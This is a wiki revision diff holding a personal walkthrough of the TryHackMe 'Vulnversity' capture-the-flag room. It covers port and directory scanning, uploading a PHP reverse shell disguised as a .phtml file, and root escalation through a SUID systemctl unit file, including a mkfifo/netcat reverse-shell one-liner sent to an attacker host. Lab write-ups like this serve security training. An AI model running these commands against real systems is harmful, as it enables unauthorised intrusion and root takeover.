The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » prac_app_tryhackme
prac_app_tryhackme

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
prac_app_tryhackme [2022/09/24 18:28] gmanprac_app_tryhackme [2022/09/24 19:03] (current) gman
Line 4: Line 4:
  
 ====== Vulnversity ====== ====== Vulnversity ======
 +
 +Write-Ups: [[https://n0w4n.nl/vulnversity/ | n0w4n]]
  
 ===== Port/Version Scan ===== ===== Port/Version Scan =====
  
-Mine: ''nmap -vv -p- -sV -A [IP]''+Mine:
  
-[[https://n0w4n.nl/vulnversity/ | n0w4n's]]: ''nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138''+<code>nmap -vv -p- -sV -A [IP]</code> 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n's]]:  
 + 
 +<code>nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138</code>
  
 ===== GoBuster (dirs) ===== ===== GoBuster (dirs) =====
  
-brute-force directories & files, DNS subdomains, and virtual host names.+Brute-force directories & files, DNS subdomains, and virtual host names
 + 
 +<code> 
 +    apt-get install gobuster 
 +    wordlists under /usr/share/wordlists 
 +    Syntax: gobuster dir -u http://<ip>:3333 -w <word list location> 
 +    -e                Print the full URLs in your console 
 +    -u                The target URL 
 +    -w                Path to your wordlist 
 +    -U and -P         Username and Password for Basic Auth 
 +    -p <x>            Proxy to use for requests 
 +    -c <http cookies> Specify a cookie for simulating your auth 
 +</code> 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Used DirSearch 
 + 
 +<code>dirsearch -u http://10.10.207.138:3333 -e php -x 400,404</code> 
 + 
 +===== Burp: Intruder ===== 
 + 
 +**Burp Suite Intruder:** Fuzz the ''/internal/'' directory to see what kinds of file extensions it will allow you to upload. 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be ''file%2ephp'', which won’t work. 
 +  * I did that... and it didn't work. 
 + 
 +===== Reverse Shell ===== 
 + 
 +Obtain an exploit reverse shell to upload: [[https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php | pentestmonkey]] 
 + 
 +  * You have to rename it .phtml to upload it. 
 +  * Upload it. 
 +  * Start a listener on your attack machine: 
 + 
 +<code> 
 +nc -lvnp 1234 
 + 
 +# -l listener 
 +# -v verbose 
 +# -n numeric-only IPs, no DNS 
 +# -p port (local port number) 
 +</code>  
 + 
 +  * Then execute the .phtml file on the target machine:  
 + 
 +<code>http:[IP]:3333/internal/uploads</code> 
 + 
 +===== Privilege Escalation ===== 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: For a lot of CTFs, a good find are files with the SUID bit set. 
 + 
 +<code> 
 +find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null 
 + 
 +# -l long listing format 
 +# -d list directory names, not contents 
 +</code> 
 + 
 +**Or use PEASS:** [[https://pentesttools.net/peass-privilege-escalation-awesome-scripts-suite/ | Privilege]]Escalation Awesom Scripts Suite 
 +  * [[https://github.com/carlospolop/PEASS-ng/releases/tag/20220918 | Download]] 
 +  * [[https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linpeas]]:  Linux local Privilege Escalation Awesome Script (.sh) 
 + 
 +**Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]] 
 + 
 +===== Exploit ===== 
 + 
 +[[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE. 
 + 
 +  * First we create a variable which holds a unique file (on target machine).  
 + 
 +<code>eop=$(mktemp).service</code> 
 + 
 +  * Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''
 + 
 +<code> 
 +echo '[Service] 
 +> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" 
 +> [Install] 
 +> WantedBy=multi-user.target' > $eop 
 +</code> 
 + 
 +  * And finally we use the /bin/systemctl program to enable the unit file. 
 + 
 +<code> 
 +/bin/systemctl link $eop 
 +# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service. 
 + 
 +/bin/systemctl enable --now $eop 
 +# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service. 
 +</code> 
 + 
 +  * Find it: 
 + 
 +<code>ls -lah /tmp</code> 
 + 
 +===== Alternative Exploit ===== 
 + 
 +**To get a reverse root shell:** 
 + 
 +**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]). 
 + 
 +<code> 
 +# nc (openbsd): 
 +rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/
 +</code> 
 + 
 +  * Create your unit file: 
 + 
 +<code> 
 +echo '[Service] 
 +Type=oneshot 
 +ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f" 
 +[Install] 
 +WantedBy=multi-user.target' > gk.service 
 +</code> 
 + 
 +  * Open a listener on your attack machine: 
 + 
 +<code>nc -lvnp 7777</code> 
 + 
 +  * Link and start the service: 
 + 
 +<code> 
 +/bin/systemctl link /tmp/gk.service         # need the full path 
 +/bin/systemctl enable --now /tmp/gk.service 
 +</code> 
 + 
 +Done.
  
 +----
  
prac_app_tryhackme.1664044092.txt.gz · Last modified: by gman